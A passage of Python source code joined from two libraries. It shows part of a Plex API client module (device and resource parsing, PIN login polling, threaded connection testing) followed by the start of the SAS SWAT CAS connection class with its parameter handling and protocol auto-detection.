key = 'https://plex.tv/api/resources?includeHttps=1&includeRelay=1'
def _loadData(self, data):
self._data = data
self.name = data.attrib.get('name')
self.accessToken = logfilter.add_secret(data.attrib.get('accessToken'))
self.product = data.attrib.get('product')
self.productVersion = data.attrib.get('productVersion')
self.platform = data.attrib.get('platform')
self.platformVersion = data.attrib.get('platformVersion')
self.device = data.attrib.get('device')
self.clientIdentifier = data.attrib.get('clientIdentifier')
self.createdAt = utils.toDatetime(data.attrib.get('createdAt'))
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.provides = data.attrib.get('provides')
self.owned = utils.cast(bool, data.attrib.get('owned'))
self.home = utils.cast(bool, data.attrib.get('home'))
self.synced = utils.cast(bool, data.attrib.get('synced'))
self.presence = utils.cast(bool, data.attrib.get('presence'))
self.connections = self.findItems(data, ResourceConnection)
self.publicAddressMatches = utils.cast(bool, data.attrib.get('publicAddressMatches'))
# This seems to only be available if its not your device (say are shared server)
self.httpsRequired = utils.cast(bool, data.attrib.get('httpsRequired'))
self.ownerid = utils.cast(int, data.attrib.get('ownerId', 0))
self.sourceTitle = data.attrib.get('sourceTitle') # owners plex username.
def connect(self, ssl=None, timeout=None):
""" Returns a new :class:`~server.PlexServer` or :class:`~client.PlexClient` object.
Often times there is more than one address specified for a server or client.
This function will prioritize local connections before remote and HTTPS before HTTP.
After trying to connect to all available addresses for this resource and
assuming at least one connection was successful, the PlexServer object is built and returned.
Parameters:
ssl (optional): Set True to only connect to HTTPS connections. Set False to
only connect to HTTP connections. Set None (default) to connect to any
HTTP or HTTPS connection.
Raises:
:class:`plexapi.exceptions.NotFound`: When unable to connect to any addresses for this resource.
"""
# Sort connections from (https, local) to (http, remote)
# Only check non-local connections unless we own the resource
connections = sorted(self.connections, key=lambda c: c.local, reverse=True)
owned_or_unowned_non_local = lambda x: self.owned or (not self.owned and not x.local)
https = [c.uri for c in connections if owned_or_unowned_non_local(c)]
http = [c.httpuri for c in connections if owned_or_unowned_non_local(c)]
cls = PlexServer if 'server' in self.provides else PlexClient
# Force ssl, no ssl, or any (default)
if ssl is True: connections = https
elif ssl is False: connections = http
else: connections = https + http
# Try connecting to all known resource connections in parellel, but
# only return the first server (in order) that provides a response.
listargs = [[cls, url, self.accessToken, timeout] for url in connections]
log.info('Testing %s resource connections..', len(listargs))
results = utils.threaded(_connect, listargs)
return _chooseConnection('Resource', self.name, results)
class ResourceConnection(PlexObject):
""" Represents a Resource Connection object found within the
:class:`~myplex.MyPlexResource` objects.
Attributes:
TAG (str): 'Connection'
address (str): Local IP address
httpuri (str): Full local address
local (bool): True if local
port (int): 32400
protocol (str): HTTP or HTTPS
uri (str): External address
"""
TAG = 'Connection'
def _loadData(self, data):
self._data = data
self.protocol = data.attrib.get('protocol')
self.address = data.attrib.get('address')
self.port = utils.cast(int, data.attrib.get('port'))
self.uri = data.attrib.get('uri')
self.local = utils.cast(bool, data.attrib.get('local'))
self.httpuri = 'http://%s:%s' % (self.address, self.port)
self.relay = utils.cast(bool, data.attrib.get('relay'))
class MyPlexDevice(PlexObject):
""" This object represents resources connected to your Plex server that provide
playback ability from your Plex Server, iPhone or Android clients, Plex Web,
this API, etc. The raw xml for the data presented here can be found at:
https://plex.tv/devices.xml
Attributes:
TAG (str): 'Device'
key (str): 'https://plex.tv/devices.xml'
clientIdentifier (str): Unique ID for this resource.
connections (list): List of connection URIs for the device.
device (str): Best guess on the type of device this is (Linux, iPad, AFTB, etc).
id (str): MyPlex ID of the device.
model (str): Model of the device (bueller, Linux, x86_64, etc.)
name (str): Hostname of the device.
platform (str): OS the resource is running (Linux, Windows, Chrome, etc.)
platformVersion (str): Version of the platform.
product (str): Plex product (Plex Media Server, Plex for iOS, Plex Web, etc.)
productVersion (string): Version of the product.
provides (str): List of services this resource provides (client, controller,
sync-target, player, pubsub-player).
publicAddress (str): Public IP address.
screenDensity (str): Unknown
screenResolution (str): Screen resolution (750x1334, 1242x2208, etc.)
token (str): Plex authentication token for the device.
vendor (str): Device vendor (ubuntu, etc).
version (str): Unknown (1, 2, 1.3.3.3148-b38628e, 1.3.15, etc.)
"""
TAG = 'Device'
key = 'https://plex.tv/devices.xml'
def _loadData(self, data):
self._data = data
self.name = data.attrib.get('name')
self.publicAddress = data.attrib.get('publicAddress')
self.product = data.attrib.get('product')
self.productVersion = data.attrib.get('productVersion')
self.platform = data.attrib.get('platform')
self.platformVersion = data.attrib.get('platformVersion')
self.device = data.attrib.get('device')
self.model = data.attrib.get('model')
self.vendor = data.attrib.get('vendor')
self.provides = data.attrib.get('provides')
self.clientIdentifier = data.attrib.get('clientIdentifier')
self.version = data.attrib.get('version')
self.id = data.attrib.get('id')
self.token = logfilter.add_secret(data.attrib.get('token'))
self.screenResolution = data.attrib.get('screenResolution')
self.screenDensity = data.attrib.get('screenDensity')
self.createdAt = utils.toDatetime(data.attrib.get('createdAt'))
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.connections = [connection.attrib.get('uri') for connection in data.iter('Connection')]
def connect(self, timeout=None):
""" Returns a new :class:`~plexapi.client.PlexClient` or :class:`~plexapi.server.PlexServer`
Sometimes there is more than one address specified for a server or client.
After trying to connect to all available addresses for this client and assuming
at least one connection was successful, the PlexClient object is built and returned.
Raises:
:class:`plexapi.exceptions.NotFound`: When unable to connect to any addresses for this device.
"""
cls = PlexServer if 'server' in self.provides else PlexClient
listargs = [[cls, url, self.token, timeout] for url in self.connections]
log.info('Testing %s device connections..', len(listargs))
results = utils.threaded(_connect, listargs)
return _chooseConnection('Device', self.name, results)
def delete(self):
""" Remove this device from your account. """
key = 'https://plex.tv/devices/%s.xml' % self.id
self._server.query(key, self._server._session.delete)
def syncItems(self):
""" Returns an instance of :class:`plexapi.sync.SyncList` for current device.
Raises:
:class:`plexapi.exceptions.BadRequest`: when the device doesn`t provides `sync-target`.
"""
if 'sync-target' not in self.provides:
raise BadRequest('Requested syncList for device which do not provides sync-target')
return self._server.syncItems(client=self)
class MyPlexPinLogin(object):
"""
MyPlex PIN login class which supports getting the four character PIN which the user must
enter on https://plex.tv/link to authenticate the client and provide an access token to
create a :class:`~plexapi.myplex.MyPlexAccount` instance.
This helper class supports a polling, threaded and callback approach.
- The polling approach expects the developer to periodically check if the PIN login was
successful using :func:`plexapi.myplex.MyPlexPinLogin.checkLogin`.
- The threaded approach expects the developer to call
:func:`plexapi.myplex.MyPlexPinLogin.run` and then at a later time call
:func:`plexapi.myplex.MyPlexPinLogin.waitForLogin` to wait for and check the result.
- The callback approach is an extension of the threaded approach and expects the developer
to pass the `callback` parameter to the call to :func:`plexapi.myplex.MyPlexPinLogin.run`.
The callback will be called when the thread waiting for the PIN login to succeed either
finishes or expires. The parameter passed to the callback is the received authentication
token or `None` if the login expired.
Parameters:
session (requests.Session, optional): Use your own session object if you want to
cache the http responses from PMS
requestTimeout (int): timeout in seconds on initial connect to plex.tv (default config.TIMEOUT).
Attributes:
PINS (str): 'https://plex.tv/pins.xml'
CHECKPINS (str): 'https://plex.tv/pins/{pinid}.xml'
POLLINTERVAL (int): 1
finished (bool): Whether the pin login has finished or not.
expired (bool): Whether the pin login has expired or not.
token (str): Token retrieved through the pin login.
pin (str): Pin to use for the login on https://plex.tv/link.
"""
PINS = 'https://plex.tv/pins.xml' # get
CHECKPINS = 'https://plex.tv/pins/{pinid}.xml' # get
POLLINTERVAL = 1
def __init__(self, session=None, requestTimeout=None):
super(MyPlexPinLogin, self).__init__()
self._session = session or requests.Session()
self._requestTimeout = requestTimeout or TIMEOUT
self._loginTimeout = None
self._callback = None
self._thread = None
self._abort = False
self._id = None
self.finished = False
self.expired = False
self.token = None
self.pin = self._getPin()
def run(self, callback=None, timeout=None):
""" Starts the thread which monitors the PIN login state.
Parameters:
callback (Callable[str]): Callback called with the received authentication token (optional).
timeout (int): Timeout in seconds waiting for the PIN login to succeed (optional).
Raises:
:class:`RuntimeError`: if the thread is already running.
:class:`RuntimeError`: if the PIN login for the current PIN has expired.
"""
if self._thread and not self._abort:
raise RuntimeError('MyPlexPinLogin thread is already running')
if self.expired:
raise RuntimeError('MyPlexPinLogin has expired')
self._loginTimeout = timeout
self._callback = callback
self._abort = False
self.finished = False
self._thread = threading.Thread(target=self._pollLogin, name='plexapi.myplex.MyPlexPinLogin')
self._thread.start()
def waitForLogin(self):
""" Waits for the PIN login to succeed or expire.
Parameters:
callback (Callable[str]): Callback called with the received authentication token (optional).
timeout (int): Timeout in seconds waiting for the PIN login to succeed (optional).
Returns:
`True` if the PIN login succeeded or `False` otherwise.
"""
if not self._thread or self._abort:
return False
self._thread.join()
if self.expired or not self.token:
return False
return True
def stop(self):
""" Stops the thread monitoring the PIN login state. """
if not self._thread or self._abort:
return
self._abort = True
self._thread.join()
def checkLogin(self):
""" Returns `True` if the PIN login has succeeded. """
if self._thread:
return False
try:
return self._checkLogin()
except Exception:
self.expired = True
self.finished = True
return False
def _getPin(self):
if self.pin:
return self.pin
url = self.PINS
response = self._query(url, self._session.post)
if not response:
return None
self._id = response.find('id').text
self.pin = response.find('code').text
return self.pin
def _checkLogin(self):
if not self._id:
return False
if self.token:
return True
url = self.CHECKPINS.format(pinid=self._id)
response = self._query(url)
if not response:
return False
token = response.find('auth_token').text
if not token:
return False
self.token = token
self.finished = True
return True
def _pollLogin(self):
try:
start = time.time()
while not self._abort and (not self._loginTimeout or (time.time() - start) < self._loginTimeout):
try:
result = self._checkLogin()
except Exception:
self.expired = True
break
if result:
break
time.sleep(self.POLLINTERVAL)
if self.token and self._callback:
self._callback(self.token)
finally:
self.finished = True
def _query(self, url, method=None):
method = method or self._session.get
log.debug('%s %s', method.__name__.upper(), url)
headers = BASE_HEADERS.copy()
response = method(url, headers=headers, timeout=self._requestTimeout)
if not response.ok: # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
raise BadRequest('(%s) %s %s; %s' % (response.status_code, codename, response.url, errtext))
data = response.text.encode('utf8')
return ElementTree.fromstring(data) if data.strip() else None
def _connect(cls, url, token, timeout, results, i, job_is_done_event=None):
""" Connects to the specified cls with url and token. Stores the connection
information to results[i] in a threadsafe way.
Arguments:
cls: the class which is responsible for establishing connection, basically it's
:class:`~plexapi.client.PlexClient` or :class:`~plexapi.server.PlexServer`
url (str): url which should be passed as `baseurl` argument to cls.__init__()
token (str): authentication token which should be passed as `baseurl` argument to cls.__init__()
timeout (int): timeout which should be passed as `baseurl` argument to cls.__init__()
results (list): pre-filled list for results
i (int): index of current job, should be less than len(results)
job_is_done_event (:class:`~threading.Event`): is X_PLEX_ENABLE_FAST_CONNECT is True then the
event would be set as soon the connection is established
"""
starttime = time.time()
try:
device = cls(baseurl=url, token=token, timeout=timeout)
runtime = int(time.time() - starttime)
results[i] = (url, token, device, runtime)
if X_PLEX_ENABLE_FAST_CONNECT and job_is_done_event:
job_is_done_event.set()
except Exception as err:
runtime = int(time.time() - starttime)
log.error('%s: %s', url, err)
results[i] = (url, token, None, runtime)
def _chooseConnection(ctype, name, results):
""" Chooses the first (best) connection from the given _connect results. """
# At this point we have a list of result tuples containing (url, token, PlexServer, runtime)
# or (url, token, None, runtime) in the case a connection could not be established.
for url, token, result, runtime in results:
okerr = 'OK' if result else 'ERR'
log.info('%s connection %s (%ss): %s?X-Plex-Token=%s', ctype, okerr, runtime, url, token)
results = [r[2] for r in results if r and r[2] is not None]
if results:
log.info('Connecting to %s: %s?X-Plex-Token=%s', ctype, results[0]._baseurl, results[0]._token)
return results[0]
raise NotFound('Unable to connect to %s: %s' % (ctype.lower(), name))
|
connection.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
Class for creating CAS sessions
'''
from __future__ import print_function, division, absolute_import, unicode_literals
import collections
import contextlib
import copy
import inspect
import itertools
import json
import os
import random
import re
import six
import warnings
import weakref
from six.moves.urllib.parse import urlparse
from . import rest
from .. import clib
from .. import config as cf
from ..exceptions import SWATError, SWATCASActionError, SWATCASActionRetry
from ..logging import logger
from ..utils.config import subscribe, get_option
from ..clib import errorcheck
from ..utils.compat import (a2u, a2n, int32, int64, float64, text_types,
binary_types, items_types, int_types, dict_types)
from ..utils import getsoptions
from ..utils.args import iteroptions
from ..formatter import SASFormatter
from .actions import CASAction, CASActionSet
from .table import CASTable
from .transformers import py2cas
from .request import CASRequest
from .response import CASResponse
from .results import CASResults
from .utils.params import ParamManager, ActionParamManager
from .utils.misc import super_dir, any_file_exists
# pylint: disable=W0212
RETRY_ACTION_CODE = 0x280034
SESSION_ABORTED_CODE = 0x2D51AC
def _option_handler(key, value):
''' Handle option changes '''
sessions = list(CAS.sessions.values())
key = key.lower()
if key == 'cas.print_messages':
key = 'print_messages'
elif key == 'cas.trace_actions':
key = 'trace_actions'
elif key == 'cas.trace_ui_actions':
key = 'trace_ui_actions'
else:
return
for ses in sessions:
ses._set_option(**{key: value})
subscribe(_option_handler)
def _lower_actionset_keys(asinfo):
'''
Lowercase action set information keys
Parameters
----------
asinfo : dict
Action set reflection information
Returns
-------
dict
Same dictionary with lower-cased action / param keys
'''
for act in asinfo.get('actions', []):
act['name'] = act['name'].lower()
for param in act.get('params', []):
param['name'] = param['name'].lower()
if 'parmList' in param:
param['parmList'] = _lower_parmlist_keys(param['parmList'])
if 'exemplar' in param:
param['exemplar'] = _lower_parmlist_keys(param['exemplar'])
return asinfo
def _lower_parmlist_keys(parmlist):
'''
Lowercase parmList/exemplar keys
Parameters
----------
parmlist : list
parmList or exemplar reflection information
Returns
-------
list
Same list with lower-cased name keys
'''
for parm in parmlist:
parm['name'] = parm['name'].lower()
if 'parmList' in parm:
parm['parmList'] = _lower_parmlist_keys(parm['parmList'])
if 'exemplar' in parm:
parm['exemplar'] = _lower_parmlist_keys(parm['exemplar'])
return parmlist
@six.python_2_unicode_compatible
class CAS(object):
'''
Create a connection to a CAS server.
Parameters
----------
hostname : string or list-of-strings, optional
Host or URL to connect to. This parameter can also be specified
by a ``CAS_URL`` or ``CAS_HOST`` environment variable.
port : int or long, optional
Port number. If not specified, the value will come from the
``cas.port`` option or ``CAS_PORT`` environment variable.
If a URL is specified in the first parameter, that port number
will be used.
username : string, optional
Name of user on CAS host. This parameter can also be specified
in a ``CAS_USER`` environment variable.
password : string, optional
Password of user on CAS host or OAuth token. If an OAuth token
is specified, the `username` parameter should be None.
This parameter can also be specified in a ``CAS_PASSWORD``
or ``CAS_TOKEN`` environment variable.
session : string, optional
ID of existing session to reconnect to.
locale : string, optional
Name of locale used for the session.
name : string, optional
User-definable name for the session.
nworkers : int or long, optional
Number of worker nodes to use.
authinfo : string or list-of-strings, optional
The filename or list of filenames of authinfo/netrc files used
for authentication.
protocol : string, optional
The protocol to use for communicating with the server.
This protocol must match the protocol spoken by the specified
server port. If the first parameter is a URL, that protocol will
be used.
path : string, optional
Base path of URL when using the REST protocol.
ssl_ca_list : string, optional
The path to the SSL certificates for the CAS server.
**kwargs : any, optional
Arbitrary keyword arguments used for internal purposes only.
Raises
------
IOError
When a connection can not be established.
Returns
-------
:class:`CAS` object
Examples
--------
To create a connection to a CAS host, you simply supply a hostname
(or list of hostnames), a port number, and user credentials. Here is
an example specifying a single hostname, and username and password as
strings.
>>> conn = swat.CAS('mycashost.com', 5570, 'username', 'password')
If you use an authinfo file and it is in your home directory, you don't
have to specify any username or password. You can override the authinfo
file location with the authinfo= parameter. This form also works for
Kerberos authentication.
>>> conn = swat.CAS('mycashost.com', 5570)
If you specify multiple hostnames, it will connect to the first available
server in the list.
>>> conn = swat.CAS(['mycashost1.com', 'mycashost2.com', 'mycashost3.com'],
5570, 'username', 'password')
URLs can also be used for both binary and REST protocols. Notice that
you need to specify the username= and password= keywords since the
port number is skipped.
>>> conn = swat.CAS('cas://mycashost1.com:5570',
... username='username', password='password')
>>> conn = swat.CAS('http://mycashost1.com:80',
... username='username', password='password')
To connect to an existing CAS session, you specify the session identifier.
>>> conn = swat.CAS('mycashost.com', 5570,
... session='ABCDEF12-ABCD-EFG1-2345-ABCDEF123456')
If you wish to change the locale used on the server, you can use the
locale= option.
>>> conn = swat.CAS('mycashost.com', 5570, locale='es_US')
To limit the number of worker nodes in a grid, you use the nworkers=
parameter.
>>> conn = swat.CAS('mycashost.com', 5570, nworkers=4)
'''
trait_names = None # Block IPython's query for this
sessions = weakref.WeakValueDictionary()
_sessioncount = 1
@classmethod
def _expand_url(cls, url):
''' Expand [...] groups in URL to all linear combinations '''
if not isinstance(url, items_types):
url = [url]
out = []
for item in url:
parts = [x for x in re.split(r'(?:\[|\])', item) if x]
for i, part in enumerate(parts):
if ',' in part:
parts[i] = re.split(r'\s*,\s*', part)
# elif re.match(r'^\d+\-\d+$', part):
# start, end = part.split('-')
# width = len(start)
# start = int(start)
# end = int(end)
# parts[i] = [('%%0%sd' % width) % x for x in range(start, end+1)]
else:
parts[i] = [part]
out += list(''.join(x) for x in itertools.product(*parts))
return out
@classmethod
def _get_connection_info(cls, hostname, port, username, password, protocol, path):
''' Distill connection information from parameters, config, and environment '''
# Get defaults from config, if needed
username = username or cf.get_option('cas.username')
password = password or cf.get_option('cas.token')
protocol = protocol or cf.get_option('cas.protocol')
hostname = hostname or cf.get_option('cas.hostname')
port = port or cf.get_option('cas.port')
logger.debug('Connection info: hostname=%s port=%s protocol=%s '
'username=%s password=%s path=%s',
hostname, port, protocol, username, password, path)
# Always make hostname a list
if not isinstance(hostname, items_types):
hostname = re.split(r'\s+', re.sub(r'\s*,\s*', r',', hostname.strip()))
else:
hostname = [re.sub(r'\s*,\s*', r',', x.strip()) for x in hostname]
# Check hostname for other components
new_hostname = []
for name in hostname:
if not re.match(r'^\w+://', hostname[0]):
new_hostname.append('%s://%s' % (protocol, name))
else:
new_hostname.append(name)
hostname = cls._expand_url(new_hostname)
urlp = urlparse(hostname[0])
protocol = urlp.scheme or protocol
hostname = [urlparse(x).hostname for x in hostname]
port = urlp.port or port
username = urlp.username or username
password = urlp.password or password
path = urlp.path or path
# Set port based on protocol, if port number is missing
if not port:
if protocol == 'http':
port = 80
elif protocol == 'https':
port = 443
elif protocol == 'cas':
port = 5570
else:
raise SWATError('Port number was not specified')
# Auto-detect protocol if still missing
if protocol == 'auto':
protocol = cls._detect_protocol(hostname, port, protocol=protocol)
if protocol not in ['http', 'https', 'cas']:
raise SWATError('Unrecognized protocol: %s' % protocol)
# For http(s), construct URLs
if protocol.startswith('http'):
urls = []
for name in hostname:
url = '%s://%s:%s' % (protocol, name, port)
if path:
url = '%s/%s' % (url, re.sub(r'^/+', r'', path))
urls.append(url)
hostname = ' '.join(urls)
logger.debug('Distilled connection parameters: '
"url='%s' username=%s", urls, username)
else:
hostname = ' '.join(hostname)
logger.debug('Distilled connection parameters: '
"hostname='%s' port=%s, username=%s, protocol=%s",
hostname, port, username, protocol)
return a2n(hostname), int(port), a2n(username), a2n(password), a2n(protocol)
def __init__(self, hostname=None, port=None, username=None, password=None,
session=None, locale=None, nworkers=None, name=None,
authinfo=None, protocol=None, path=None, ssl_ca_list=None,
**kwargs):
# Filter session options allowed as parameters
_kwargs = {}
sess_opts = {}
for k, v in kwargs.items():
if k.lower() in ['caslib', 'metrics', 'timeout', 'timezone']:
sess_opts[k] = v
else:
_kwargs[k] = v
kwargs = _kwargs
# Check for unknown connection parameters
unknown_keys = [k for k in kwargs if k not in ['prototype']]
if unknown_keys:
warnings.warn('Unrecognized keys in connection parameters: %s' %
', '.join(unknown_keys))
# If a prototype exists, use it for the connection config
prototype = kwargs.get('prototype')
if prototype is not None:
soptions = a2n(prototype._soptions)
protocol = a2n(prototype._protocol)
else:
# Distill connection information from parameters, config, and environment
hostname, port, username, password, protocol = \
self._get_connection_info(hostname, port, username,
password, protocol, path)
soptions = a2n(getsoptions(session=session, locale=locale,
nworkers=nworkers, protocol=protocol))
# Check for SSL certificate
if ssl_ca_list is None:
ssl_ca_list = cf.get_option('cas.ssl_ca_list')
if ssl_ca_list:
logger.debug('Using certificate file: %s', ssl_ca_list)
os.environ['CAS_CLIENT_SSL_CA_LIST'] = ssl_ca_list
# Check for explicitly specified authinfo files
if authinfo is not None:
if not any_file_exists(authinfo):
if not isinstance(authinfo, items_types):
authinfo = [authinfo]
raise OSError('None of the specified authinfo files from'
'list exist: %s' % ', '.join(authinfo))
# Create error handler
try:
if protocol in ['http', 'https']:
self._sw_error = rest.REST_CASError(soptions)
else:
self._sw_error = clib.SW_CASError(soptions)
except SystemError:
raise SWATError('Could not create CAS error handler object. '
'Check your SAS TK path setting.')
# Make the connection
try:
# Make a copy of the prototype connection
if prototype is not None:
self._sw_connection = errorcheck(prototype._sw_connection.copy(),
prototype._sw_connection)
# Create a new connection
else:
# Set up authinfo paths
if authinfo is not None and password is None:
password = ''
if not isinstance(authinfo, items_types):
authinfo = [authinfo]
for item in authinfo:
password += '{%s}' % item
password = 'authinfo={%s}' % password
# Set up connection parameters
params = (hostname, port, username, password, soptions, self._sw_error)
if protocol in ['http', 'https']:
self._sw_connection = rest.REST_CASConnection(*params)
else:
self._sw_connection = clib.SW_CASConnection(*params)
# If we don't have a connection, bail out.
if self._sw_connection is None:
raise SystemError
except SystemError:
raise SWATError(self._sw_error.getLastErrorMessage())
# Set up index origin for error messages
errorcheck(self._sw_connection.setZeroIndexedParameters(), self._sw_connection)
# Get instance structure values from connection layer
self._hostname = errorcheck(
a2u(self._sw_connection.getHostname(), 'utf-8'), self._sw_connection)
self._port = errorcheck(self._sw_connection.getPort(), self._sw_connection)
self._username = errorcheck(
a2u(self._sw_connection.getUsername(), 'utf-8'), self._sw_connection)
self._session = errorcheck(
a2u(self._sw_connection.getSession(), 'utf-8'), self._sw_connection)
self._soptions = errorcheck(
a2u(self._sw_connection.getSOptions(), 'utf-8'), self._sw_connection)
self._protocol = protocol
if name:
self._name = a2u(name)
else:
self._name = 'py-session-%d' % type(self)._sessioncount
type(self)._sessioncount = type(self)._sessioncount + 1
# Caches for action classes and reflection information
self._action_classes = {}
self._action_info = {}
self._actionset_classes = {}
self._actionset_info = {}
# Dictionary of result hook functions
self._results_hooks = {}
# Preload __dir__ information. It will be extended later with action names
self._dir = set([x for x in super_dir(CAS, self)])
# Pre-populate action set attributes
for asname, value in self._raw_retrieve('builtins.help',
showhidden=True,
_messagelevel='error',
_apptag='UI').items():
self._actionset_classes[asname.lower()] = None
if value is not None:
for actname in value['name']:
self._action_classes[asname.lower() + '.' + actname.lower()] = None
self._action_classes[actname.lower()] = None
# Populate CASTable documentation and method signatures
CASTable._bootstrap(self)
init = CASTable.__init__
if hasattr(init, '__func__'):
init = init.__func__
self.CASTable.__func__.__doc__ = init.__doc__
# Add loadactionset handler to populate actionset and action classes
def handle_loadactionset(conn, results):
''' Force the creation of actionset and action classes '''
if 'actionset' in results:
conn.__getattr__(results['actionset'], atype='actionset')
self.add_results_hook('builtins.loadactionset', handle_loadactionset)
# Set the session name
self._raw_retrieve('session.sessionname', name=self._name,
_messagelevel='error', _apptag='UI')
# Set session options
if sess_opts:
self._raw_retrieve('sessionprop.setsessopt', _messagelevel='error',
_apptag='UI', **sess_opts)
# Set options
self._set_option(print_messages=cf.get_option('cas.print_messages'))
self._set_option(trace_actions=cf.get_option('cas.trace_actions'))
self._set_option(trace_ui_actions=cf.get_option('cas.trace_ui_actions'))
# Add the connection to a global dictionary for use by IPython notebook
type(self).sessions[self._session] = self
type(self).sessions[self._name] = self
def _id_generator():
''' Generate unique IDs within a connection '''
num = 0
while True:
yield num
num = num + 1
self._id_generator = _id_generator()
(self.server_type,
self.server_version,
self.server_features) = self._get_server_features()
def _gen_id(self):
''' Generate an ID unique to the session '''
import numpy
return numpy.base_repr(next(self._id_generator), 36)
def _get_server_features(self):
'''
Determine which features are available in the server
Returns
-------
set-of-strings
'''
out = set()
info = self.retrieve('builtins.serverstatus', _messagelevel='error',
_apptag='UI')
version = tuple([int(x) for x in info['About']['Version'].split('.')][:2])
stype = info['About']['System']['OS Name'].lower()
# if version >= (3, 4):
# out.add('csv-ints')
return stype, version, out
@classmethod
def _detect_protocol(cls, hostname, port, protocol=None, timeout=3):
'''
Detect the protocol type for the given host and port
Parameters
----------
hostname : string or list
The CAS host to connect to.
port : int
The CAS port to connect to.
protocol : string, optional
The protocol override value.
timeout : int, optional
Timeout (in seconds) for checking a protocol
Returns
-------
string
'cas', 'http', or 'https'
'''
if protocol is None:
protocol = cf.get_option('cas.protocol')
if isinstance(hostname, six.string_types):
hostname = re.split(r'\s+', hostname.strip())
if protocol != 'auto':
logger.debug('Protocol specified explicitly: %s' % protocol)
# Try to detect the proper protocol
if protocol == 'auto':
try:
import queue
except ImportError:
import Queue as queue
import socket
import ssl
import threading
for host in hostname:
out = queue.Queue()
logger.debug('Attempting protocol auto-detect on %s:%s', host, port)
def check_cas_protocol():
''' Test port for CAS (binary) support '''
proto = None
try:
cas_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cas_socket.settimeout(timeout)
cas_socket.connect((host, port))
cas_socket.sendall(bytearray([0, 0x53, 0x41, 0x43,
0x10, 0, 0, 0, 0, 0, 0, 0,
0x10, 0, 0, 0,
0, 0, 0, 0,
2, 0, 0, 0,
5, 0, 0, 0]))
if cas_socket.recv(4) == b'\x00SAC':
proto = 'cas'
except Exception:
pass
finally:
cas_socket.close()
out.put(proto)
def check_https_protocol():
''' Test port for HTTPS support '''
proto = None
try:
ssl_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_socket.settimeout(timeout)
ssl_context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
ssl_conn = ssl_context.wrap_socket(ssl_socket,
server_hostname=host)
ssl_conn.connect((host, port))
ssl_conn.write(('GET /cas HTTP/1.1\r\n'
+ ('Host: %s\r\n' % host)
+ 'Connection: close\r\n'
+ 'User-Agent: Python-SWAT\r\n'
+ 'Cache-Control: no-cache\r\n\r\n')
.encode('utf8'))
except ssl.SSLError as exc:
if 'certificate verify failed' in str(exc):
proto = 'https'
except Exception:
pass
finally:
ssl_socket.close()
out.put(proto)
def check_http_protocol():
''' Test port for HTTP support '''
proto = None
try:
http_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
http_socket.settimeout(timeout)
http_socket.connect((host, port))
http_socket.send(('GET /cas HTTP/1.1\r\n'
+ ('Host: %s\r\n' % host)
+ 'Connection: close\r\n'
+ 'User-Agent: Python-SWAT\r\n'
+ 'Cache-Control: no-cache\r\n\r\n')
.encode('utf8'))
txt = http_socket.recv(16).decode('utf-8').lower()
if txt.startswith('http') and txt.split()[1] != '400':
proto = 'http'
except Exception:
pass
finally:
http_socket.close()
out.put(proto)
checkers = [check_cas_protocol, check_https_protocol, check_http_protocol]
for item in checkers:
threading.Thread(target=item).start()
try:
for i in range(len(checkers)):
proto = out.get(block=True, timeout=timeout)
if proto is not None:
protocol = proto
break
except queue.Empty:
pass
if protocol != 'auto':
logger.debug('Protocol detected: %s', protocol)
break
# No protocol detected
if protocol == 'auto':
if port == 80:
logger.debug('Protocol defaulted by port 80: http')
protocol = 'http'
elif port == 443:
logger.debug('Protocol defaulted by port 443: http')
protocol = 'https'
else:
logger.debug('No protocol detected: defaulting to \'cas\'')
protocol = 'cas'
return protocol
def __enter__(self):
''' Enter a context '''
return self
def __exit__(self, type, value, traceback):
''' Exit the context '''
self.retrieve('session.endsession', _apptag='UI', _messagelevel='error')
self.close()
@contextlib.contextmanager
def session_context(self, *args, **kwargs):
'''
Create a context of session options
This method is intended to be used in conjunction with Python's
``with`` statement. It allows you to set CAS session options within
that context, then revert them back to their previous state.
For all possible session options, see the `sessionprop.getsessopt`
CAS action documentation.
Parameters
----------
*args : string / any pairs
Name / value pairs of options in consecutive arguments, name / value
pairs in tuples, or dictionaries.
**kwargs : string / any pairs
Key / value pairs of session options
Examples
--------
>>> conn = swat.CAS()
>>> print(conn.getsessopt('locale').locale)
en_US
>>> with conn.session_context(locale='fr'):
... print(conn.getsessopt('locale').locale)
fr
>>> print(conn.getsessopt('locale').locale)
en_US
'''
state = {}
newkwargs = {}
for key, value in iteroptions(*args, **kwargs):
state[key.lower()] = list(self.retrieve('sessionprop.getsessopt',
_messagelevel='error',
_apptag='UI',
name=key.lower()).values())[0]
newkwargs[key.lower()] = value
self.retrieve('sessionprop.setsessopt', _messagelevel='error',
_apptag='UI', **newkwargs)
yield
self.retrieve('sessionprop.setsessopt', _messagelevel='error',
_apptag='UI', **state)
def get_action_names(self):
'''
Return the list of action classes
Returns
-------
list of strings
'''
return self._action_classes.keys()
def get_actionset_names(self):
'''
Return the list of actionset classes
Returns
-------
list of strings
'''
return self._actionset_classes.keys()
def has_action(self, name):
'''
Does the given action name exist?
Parameters
----------
name : string
The name of the CAS action to look for.
Returns
-------
boolean
'''
return name.lower() in self._action_classes
def has_actionset(self, name):
'''
Does the given actionset name exist?
Parameters
----------
name : string
The name of the CAS action set to look for.
Returns
-------
boolean
'''
return name.lower() in self._actionset_classes
def get_action(self, name):
'''
Get the CAS action instance for the given action name
Parameters
----------
name : string
The name of the CAS action to look for.
Returns
-------
:class:`CASAction` object
'''
return self.__getattr__(name, atype='action')
def get_action_class(self, name):
'''
Get the CAS action class for the given action name
Parameters
----------
name : string
The name of the CAS action to look for.
Returns
-------
:class:`CASAction`
'''
return self.__getattr__(name, atype='action_class')
def get_actionset(self, name):
'''
Get the CAS action set instance for the given action set name
Parameters
----------
name : string
